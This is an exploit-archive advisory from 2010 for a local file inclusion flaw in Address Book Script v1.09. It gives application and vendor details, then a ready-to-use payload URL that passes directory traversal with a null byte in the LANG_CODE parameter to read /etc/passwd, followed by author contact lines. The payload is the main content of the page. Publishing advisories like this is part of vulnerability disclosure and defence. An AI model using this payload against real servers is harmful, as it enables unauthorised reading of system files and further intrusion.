Address Book Script v 1.09 - Local File Inclusion

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Address Book Script v 1.09 - Local File Inclusion
# Published : 2010-03-15
# Author : Pouya Daneshmand
# Previous Title : Joomla com_org SQL Injection Vulnerability (letter parameter)
# Next Title : osDate v 2.1.9 - Remote File Inclusion Vulnerabilities

#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Address Book Script
# Version: 1.9
# Vendor: http://www.phpkobo.com/address_book.php
#################################################################
# Vulnerability Info:
# Type: Local File Inclusion
# Risk: Medium
#################################################################
Vulnerability:
http://site.com/codelib/cfg/common.inc.php?LANG_CODE=../../../../../../etc/passwd%00

#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################